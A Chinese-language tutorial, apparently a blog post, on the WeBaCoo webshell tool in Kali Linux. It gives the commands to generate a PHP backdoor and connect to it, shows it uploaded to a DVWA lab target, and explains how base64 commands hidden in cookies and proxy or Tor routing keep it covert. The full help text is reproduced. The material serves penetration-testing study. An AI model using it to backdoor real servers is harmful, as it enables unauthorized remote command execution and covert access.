webacoo
webshell其實就是放置在伺服器上的一段代碼
kali中生成webshell的工具
WeBaCoo(Web Backdoor Cookie)

特點及使用方法
- 類終端的shell
- 編碼通信内容通過cookie頭傳輸,隐蔽性強
- cookie中傳遞資料使用的參數:
- cm:base64編碼的指令
- cn:伺服器用于傳回資料的cookie頭的名
- cp:傳回資訊定界符
- 生成服務端
- Webacoo -g -o a.php
- 用戶端連接配接
- Webacoo -t -u http://x.x.x.x/a.php
生成一個webshell測試:
檢視檔案内容可以看到是被base64加密的
在DVWA靶機環境中上傳該檔案
然後使用webacoo連接配接伺服器
成功連接配接:
可以直接執行系統指令:
webacoo的隐蔽性高之一是因為他采用的是cookie傳參,且為base64加密
接着使用wireshark抓包檢視其cookie參數:
這裡cm選項中的字元串經過解碼後就是我們傳入的指令ls
伺服器端傳回的setcookie中的M-cookie字段就是指令傳回的結果,cp變量值為QXg@和M-cookie中的開頭對應,為界定符。
這裡的M-cookie可以在連接配接webshell時通過-c參數自定義:
除此外,webacoo還可以在連接配接時使用-p選項,通過代理伺服器連接配接目标伺服器
更多參數可以通過webacoo -h檢視幫助手冊
1 root@bogon:~# webacoo -h
2
3 WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
4 Copyright (C) 2011-2012 Anestis Bechtsoudis
5 { @anestisb | [email protected] | http(s)://bechtsoudis.com }
6
7
8 Usage: webacoo [options]
9
10 Options:
11 -g Generate backdoor code (-o is required)
12
13 -f FUNCTION PHP System function to use
14 FUNCTION
15 1: system (default)
16 2: shell_exec
17 3: exec
18 4: passthru
19 5: popen
20
21 -o OUTPUT Generated backdoor output filename
22
23 -r Return un-obfuscated backdoor code
24
25 -t Establish remote "terminal" connection (-u is required)
26
27 -u URL Backdoor URL
28
29 -e CMD Single command execution mode (-t and -u are required)
30
31 -m METHOD HTTP method to be used (default is GET)
32
33 -c C_NAME Cookie name (default: "M-cookie")
34
35 -d DELIM Delimiter (default: New random for each request)
36
37 -a AGENT HTTP header user-agent (default exist)
38
39 -p PROXY Use proxy (tor, ip:port or user:pass:ip:port)
40
41 -v LEVEL Verbose level
42 LEVEL
43 0: no additional info (default)
44 1: print HTTP headers
45 2: print HTTP headers + data
46
47 -l LOG Log activity to file
48
49 -h Display help and exit
50
51 update Check for updates and apply if any